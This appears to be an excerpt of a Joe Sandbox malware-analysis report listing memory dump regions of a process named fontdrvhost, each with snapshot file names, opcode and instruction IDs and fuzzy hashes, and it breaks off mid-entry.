                                                                                                                                                                                              • Instruction ID: 4cc07475a6453819c79974a635e0965047e3aff5fcd0c0af4e52f197486d7be5
                                                                                                                                                                                              • Opcode Fuzzy Hash: 23c7008b6420d38a11a785cc10862ec7b442ee0e9a5cd16a711961c7567ee13f
                                                                                                                                                                                              • Instruction Fuzzy Hash: 1AE0657154E7C44FC716EA3488694557FA0EF6720574A51EEC085CF1A3DA1D9849C701
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000019.00000002.1886548395.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_25_2_7ffd9b8c0000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: I
                                                                                                                                                                                              • API String ID: 0-3707901625
                                                                                                                                                                                              • Opcode ID: 807c5df551611f8d0a97f4afdab0e68e7d265dbb3011e7b040b497a03c959c29
                                                                                                                                                                                              • Instruction ID: 98ce434c1b4251c16592155332c29dd29705585dca9bf0d936a322bdca33996c
                                                                                                                                                                                              • Opcode Fuzzy Hash: 807c5df551611f8d0a97f4afdab0e68e7d265dbb3011e7b040b497a03c959c29
                                                                                                                                                                                              • Instruction Fuzzy Hash: 19E01A6194F3C44FCB16EB7488698543FA0EE6B21178B41EFC085CF1B3E62D9949C701
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000019.00000002.1886548395.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_25_2_7ffd9b8a0000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: I
                                                                                                                                                                                              • API String ID: 0-3707901625
                                                                                                                                                                                              • Opcode ID: 0fe23f383d483e22caafc6331c7e6b683d137e362a5c1569d48854e89e92fc70
                                                                                                                                                                                              • Instruction ID: f7aa2b1ff952f709c02ce7dd39e045c0ef4c2b37d13894de62bd6d4f523224bf
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0fe23f383d483e22caafc6331c7e6b683d137e362a5c1569d48854e89e92fc70
                                                                                                                                                                                              • Instruction Fuzzy Hash: DFE04F7054F3C04FCB16EB7484A98457FB0DE6721078B41DEC08ACB1B3E62D8949C701
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000019.00000002.1886548395.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_25_2_7ffd9b8a0000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: aed93e30fcf959f6bd1c5ba06e4e719eac4daa097b15a2511dd29c74795d695e
                                                                                                                                                                                              • Instruction ID: 071ede6ef9636e5e4c017aad61194c86593e8927b9e53b702d995d13385b29dc
                                                                                                                                                                                              • Opcode Fuzzy Hash: aed93e30fcf959f6bd1c5ba06e4e719eac4daa097b15a2511dd29c74795d695e
                                                                                                                                                                                              • Instruction Fuzzy Hash: 4542C321B1E94E4BEBA8EB5884A16B477A2FF9C300F1545B9D05EC32D7DE34BD828741
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000019.00000002.1886548395.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_25_2_7ffd9b890000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 8d4ae70000dc99d3264ae4cdb4bc46e5dd0260f3df7a8a436a064c11660ae8f3
                                                                                                                                                                                              • Instruction ID: 47edcdd5ac7d25f4089c2d613c68655a2cedece659d50a43b93c3bd4c407bf2e
                                                                                                                                                                                              • Opcode Fuzzy Hash: 8d4ae70000dc99d3264ae4cdb4bc46e5dd0260f3df7a8a436a064c11660ae8f3
                                                                                                                                                                                              • Instruction Fuzzy Hash: EC412C22B1CA294FE71DB7BC74A95F97BC1DF88325B0404BBD04EC71E7DD68A8428285
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000019.00000002.1886548395.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_25_2_7ffd9b8c0000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: c1c40657d818516957ee279f9a86525214a97e95a0a80fba49ecef5a26c318ed
                                                                                                                                                                                              • Instruction ID: 4d0239a305458a17ec52c52df9a870aafde19b213d6ca6330c4f4dc77f3d7bf7
                                                                                                                                                                                              • Opcode Fuzzy Hash: c1c40657d818516957ee279f9a86525214a97e95a0a80fba49ecef5a26c318ed
                                                                                                                                                                                              • Instruction Fuzzy Hash: D1416972A0E95D4FE764FB98C8A4AF537A1EF99320F05027BD019C72D2DE646D458381
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000019.00000002.1886548395.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_25_2_7ffd9b890000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: c3d7e5f302a88f8ec2398e6a7592314a031dcba88df827417dd45c6b7d3b22c7
                                                                                                                                                                                              • Instruction ID: bca0f1e372febbe837976f94a5852267870b57ca5a8ba7f4bf1529b6f6946c55
                                                                                                                                                                                              • Opcode Fuzzy Hash: c3d7e5f302a88f8ec2398e6a7592314a031dcba88df827417dd45c6b7d3b22c7
                                                                                                                                                                                              • Instruction Fuzzy Hash: 6121D83130DC194FEB68EB5CE889DB977D1FB5932171501BAE58AC7136D911EC8287C1
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000019.00000002.1886548395.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_25_2_7ffd9b8c0000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: e6b59391de73d411b91f028e11ca2f765ac64cb40cd78141fa5a5f628301956e
                                                                                                                                                                                              • Instruction ID: 045f2f3285b16c98c71c61dc74d105af6ee55c34e95d7d434d9f5fb18b7403f0
                                                                                                                                                                                              • Opcode Fuzzy Hash: e6b59391de73d411b91f028e11ca2f765ac64cb40cd78141fa5a5f628301956e
                                                                                                                                                                                              • Instruction Fuzzy Hash: ED3126A1B1A95E5FE7A8F76C58A66B563D2EFAC341B1400BAE00DC31EBDD386D424341
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000019.00000002.1886548395.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_25_2_7ffd9b890000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: ff2bfb1a742e86a5aead046827ed05cb3e0b09f9f62fa1f9c7967e6e8e91eceb
                                                                                                                                                                                              • Instruction ID: 67242d3cca5d2cc044b986793097555770650c26271bf964eb56fb6be2806a0a
                                                                                                                                                                                              • Opcode Fuzzy Hash: ff2bfb1a742e86a5aead046827ed05cb3e0b09f9f62fa1f9c7967e6e8e91eceb
                                                                                                                                                                                              • Instruction Fuzzy Hash: F6312732B1D25D8FEB26A7E89C652EC7F60EF45328F1541B3D058CB1D3D93826468791
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000019.00000002.1886548395.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_25_2_7ffd9b890000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: e6f7427443e13579eed525843e36cfde0065d12c53e5eddeda47551a95e00b18
                                                                                                                                                                                              • Instruction ID: ffd4b1a0c65f3e5b28049ecee116456d27625c064fcab80edfbe6a2c4a9d94cb
                                                                                                                                                                                              • Opcode Fuzzy Hash: e6f7427443e13579eed525843e36cfde0065d12c53e5eddeda47551a95e00b18
                                                                                                                                                                                              • Instruction Fuzzy Hash: 1631A131A0D68E9FDF56EB64C8659A97FF0EF5A300B0905FBD009D71E3DA28A944C741
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000019.00000002.1886548395.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_25_2_7ffd9b890000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 701a5470bc759148d8936116bcb213e03b23c8cbb39dbe9e669b13e7fe27d475
                                                                                                                                                                                              • Instruction ID: 4523b790a5c23da9546074154c2ba2d1083ad6dfd774a297fe4fd30509cccf9a
                                                                                                                                                                                              • Opcode Fuzzy Hash: 701a5470bc759148d8936116bcb213e03b23c8cbb39dbe9e669b13e7fe27d475
                                                                                                                                                                                              • Instruction Fuzzy Hash: 1221F920F2DD2D1FEB98B76C546967AB6C2EB9C312F5100B9E40DC32E7DD38AC414281
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000019.00000002.1886548395.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_25_2_7ffd9b890000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 3cb49cf54aa7f764c91e9a318d01fce54445bf4d273e72d9f50b97eefdd5271e
                                                                                                                                                                                              • Instruction ID: 47493958b91138f88d434bc540e9d8413ddd1d8f7121425b014e342da1a027ea
                                                                                                                                                                                              • Opcode Fuzzy Hash: 3cb49cf54aa7f764c91e9a318d01fce54445bf4d273e72d9f50b97eefdd5271e
                                                                                                                                                                                              • Instruction Fuzzy Hash: E3110332B1D50D4FEF68EFE8D464ABD27D2EF98710F160175D44ED31B2DD28AA418600
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000019.00000002.1886548395.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_25_2_7ffd9b890000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 88aad447f005335d36044f9fab7e5a2a3ae8194ff232c3914eb2a1828878bffe
                                                                                                                                                                                              • Instruction ID: 7655822180583076f46b6a5ad39dfedb08a13f73d185dd43f4edea62f79703cd
                                                                                                                                                                                              • Opcode Fuzzy Hash: 88aad447f005335d36044f9fab7e5a2a3ae8194ff232c3914eb2a1828878bffe
                                                                                                                                                                                              • Instruction Fuzzy Hash: 40113321F1D91E4FEFB8EB9884746B86691FF4C710F5601B5D44EE32B2DE286E414740
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000019.00000002.1886548395.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_25_2_7ffd9b890000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 29b97772516ca9f54207d5a4a5e716492b262a908c64ebbc54847decb89cdfbc
                                                                                                                                                                                              • Instruction ID: 5d677564f003d3d217a1fa3193800b0180851eaf534c8b7c8f14c3a4d558b7f4
                                                                                                                                                                                              • Opcode Fuzzy Hash: 29b97772516ca9f54207d5a4a5e716492b262a908c64ebbc54847decb89cdfbc
                                                                                                                                                                                              • Instruction Fuzzy Hash: 4811C232B1E64D9FEB129BB4986119C7FB0EF56714F1640B3D054DB2A2E53827468780
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000019.00000002.1886548395.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_25_2_7ffd9b890000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: b41800984097a59a97d7a866b6f0eb8ec03ed0f3235a3e95513367b0b3781845
                                                                                                                                                                                              • Instruction ID: 0b95860b426c8bdcb45cad549b315a3fb5dcae56d270435489bac2611dfd5ea5
                                                                                                                                                                                              • Opcode Fuzzy Hash: b41800984097a59a97d7a866b6f0eb8ec03ed0f3235a3e95513367b0b3781845
                                                                                                                                                                                              • Instruction Fuzzy Hash: 9801AD32A1E68D9FEB129BA498601997FB0EF56714F1640F3D054DB2A2D93827498780
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000019.00000002.1886548395.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_25_2_7ffd9b8c0000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 71488b1945a39db5c0b3baa00e46e9fb98543f70bbaff2166aca092323af7b69
                                                                                                                                                                                              • Instruction ID: 8df0f0ba300cbf31ef36988588b423f0135d6de5537324bf40b1eb5088726367
                                                                                                                                                                                              • Opcode Fuzzy Hash: 71488b1945a39db5c0b3baa00e46e9fb98543f70bbaff2166aca092323af7b69
                                                                                                                                                                                              • Instruction Fuzzy Hash: D4019A72F0951E4BEB68E798D4A83F9B2E1EB9C300F010472D009E7191DA38AE818B90
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000019.00000002.1886548395.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_25_2_7ffd9b890000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 9b2632a26850b3e21b245e8a2b414ecdebee7280b76df477f37caf473e839f52
                                                                                                                                                                                              • Instruction ID: 64a9b6128c66e1c2c32ab4e331c466af1d1ba2639897ec7eac60b5777d00c890
                                                                                                                                                                                              • Opcode Fuzzy Hash: 9b2632a26850b3e21b245e8a2b414ecdebee7280b76df477f37caf473e839f52
                                                                                                                                                                                              • Instruction Fuzzy Hash: 7401C832A1E28C9FEB129BA488600987FB0EF06304F1640F3D044CB2A2E9382B498780
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000019.00000002.1886548395.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_25_2_7ffd9b890000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: b69e98c5ac202e018f4fa0537406495c618a30ab251d31efa8dc9914af63123e
                                                                                                                                                                                              • Instruction ID: 341a21bd382d173806e9b5f91c080d3a440ace39ba1a61bc9f2d1a114da783fc
                                                                                                                                                                                              • Opcode Fuzzy Hash: b69e98c5ac202e018f4fa0537406495c618a30ab251d31efa8dc9914af63123e
                                                                                                                                                                                              • Instruction Fuzzy Hash: B8017C31E1E38DDFEB129BA488641997FB0EF16704F1641E3D054CB2A6E9386B448741
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000019.00000002.1886548395.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_25_2_7ffd9b890000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 761e2923b077f2d9600d50a95bc5eded3f37b587bffd50bfc0c14b2e65bdc6d3
                                                                                                                                                                                              • Instruction ID: f9fbecf2eb58dcc10385430076d086ba60848318b9c564c5c2b180a6635b00c5
                                                                                                                                                                                              • Opcode Fuzzy Hash: 761e2923b077f2d9600d50a95bc5eded3f37b587bffd50bfc0c14b2e65bdc6d3
                                                                                                                                                                                              • Instruction Fuzzy Hash: E5F03631B1951E4EEF78AF94C864AF877A1FF48311F1201B9D48ED31B1DE386A818A00
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000019.00000002.1886548395.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_25_2_7ffd9b890000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 428764437d29e1890ab5c5ac2c1d17129b049794f483ad01c538d826eaafabbb
                                                                                                                                                                                              • Instruction ID: 178ee989b79cac0ac8278d02df7fae1a4867d8ac22c478f8b0a3f73694fc5c90
                                                                                                                                                                                              • Opcode Fuzzy Hash: 428764437d29e1890ab5c5ac2c1d17129b049794f483ad01c538d826eaafabbb
                                                                                                                                                                                              • Instruction Fuzzy Hash: D2F0D621B1D40E4AEE78DF94D864AB92792EF98715F170175D48EE31B2DD286A414640
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000019.00000002.1886548395.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_25_2_7ffd9b8c0000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 217664a5e0e589652af0e9c72916594742e172a574c878877e0be539d4c9c3ba
                                                                                                                                                                                              • Instruction ID: 91544e153e783a9c65b124145317721735bbc62158dc2fe9589979628752e257
                                                                                                                                                                                              • Opcode Fuzzy Hash: 217664a5e0e589652af0e9c72916594742e172a574c878877e0be539d4c9c3ba
                                                                                                                                                                                              • Instruction Fuzzy Hash: 92F0E521B5DBC80FC76AA62D4869071BFE1DB5B60134A42FFC186C72E3ED59AC858341
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000019.00000002.1886548395.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_25_2_7ffd9b890000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 080d8cc4106a9e78b57f6ca52af0199080451e0b5302b78b9254548529d9dabf
                                                                                                                                                                                              • Instruction ID: 640ac56d0b876671c35af720ea56fa958c289c75a9efa88cd5553ae5dec9ada0
                                                                                                                                                                                              • Opcode Fuzzy Hash: 080d8cc4106a9e78b57f6ca52af0199080451e0b5302b78b9254548529d9dabf
                                                                                                                                                                                              • Instruction Fuzzy Hash: 63E02236608A09CFDB00AB79CC94482BF90EB0961ABAA00AED149C7622E2215828CB44
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000019.00000002.1886548395.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_25_2_7ffd9b8c0000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 2db50bb553b2a52edcf6b230bc6b94f55545eacec6b52e5246c98727e97a84c7
                                                                                                                                                                                              • Instruction ID: c5b656f52c387db2fe42cd3f8daff393098e0717dd3793ecb4d9f3f42fb82b75
                                                                                                                                                                                              • Opcode Fuzzy Hash: 2db50bb553b2a52edcf6b230bc6b94f55545eacec6b52e5246c98727e97a84c7
                                                                                                                                                                                              • Instruction Fuzzy Hash: 13E092207197C80FC70A973888696607FA1EF5B115B8A12EBC045CB1A3EA1CDC89C741
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000019.00000002.1886548395.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_25_2_7ffd9b8c0000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 7701f8456bd58bfa4744ce5fb1d91b596514878c3aae87ff0898706f2a86e41a
                                                                                                                                                                                              • Instruction ID: a07ad19b1aaa34058b89c654808bfb88d22619575cb349f7a261dbfc7d2cf6ee
                                                                                                                                                                                              • Opcode Fuzzy Hash: 7701f8456bd58bfa4744ce5fb1d91b596514878c3aae87ff0898706f2a86e41a
                                                                                                                                                                                              • Instruction Fuzzy Hash: C0E09220709B884FC70DA62848684207BF1EFAA20278A42EBC005CB2A3ED19DC89C741
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000019.00000002.1886548395.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_25_2_7ffd9b8a0000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: dc371ec160168cd39696a4658f553f3061aafaa4a711842f765bb6b4ea0a0e0b
                                                                                                                                                                                              • Instruction ID: fd82295baa933ac39da84980254786897a06c0d67b7e4eefaf508526c093b0a1
                                                                                                                                                                                              • Opcode Fuzzy Hash: dc371ec160168cd39696a4658f553f3061aafaa4a711842f765bb6b4ea0a0e0b
                                                                                                                                                                                              • Instruction Fuzzy Hash: 64F03731B0D50E8BEE64EB88D4506B93291EB8C351F164579D44EC32D7DE38AA468690
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000019.00000002.1886548395.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_25_2_7ffd9b8c0000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: d657033e7f1e42707a2fd1899084cb3edd43e1e2f0408bbae95c4a1d20cc0d7b
                                                                                                                                                                                              • Instruction ID: b1f145deeac4e623ca810904af43e44328c55d6181578462ada5dbba2a8ca58c
                                                                                                                                                                                              • Opcode Fuzzy Hash: d657033e7f1e42707a2fd1899084cb3edd43e1e2f0408bbae95c4a1d20cc0d7b
                                                                                                                                                                                              • Instruction Fuzzy Hash: CAE09271B095198BE728A718C4A07B53281FB9C310F12517AC04ED32E3DA386E4285C1
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000019.00000002.1886548395.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_25_2_7ffd9b8c0000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: b9715cb128ca777300d120e418b9a8cca8ba5427e6d43e31375aec8a3ab90a64
                                                                                                                                                                                              • Instruction ID: f5789e83cd0411df37cd9867f4405001acf82aa4eab888cdc1c01bc0b8e156d8
                                                                                                                                                                                              • Opcode Fuzzy Hash: b9715cb128ca777300d120e418b9a8cca8ba5427e6d43e31375aec8a3ab90a64
                                                                                                                                                                                              • Instruction Fuzzy Hash: 9FE04F2160A7C44FC70AA7688C699503FB1DE6B21174A41DBC045CB6B3E919C849C742
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000019.00000002.1886548395.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_25_2_7ffd9b890000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: d20051572f8ab65bbc61363d2ae0d262ba6f41f2c51e5cea1e06876f8bc17ab4
                                                                                                                                                                                              • Instruction ID: 37b106a7befe78c09ab626c497e57741f9e0581a714484db4a7ea9cc829430fd
                                                                                                                                                                                              • Opcode Fuzzy Hash: d20051572f8ab65bbc61363d2ae0d262ba6f41f2c51e5cea1e06876f8bc17ab4
                                                                                                                                                                                              • Instruction Fuzzy Hash: B8E0D841D5F34E05EA1322BD58760AC7E541F9A614F9600B3D44D460B2B88D22990652
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000019.00000002.1886548395.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_25_2_7ffd9b8c0000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                                                                                                                                              • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
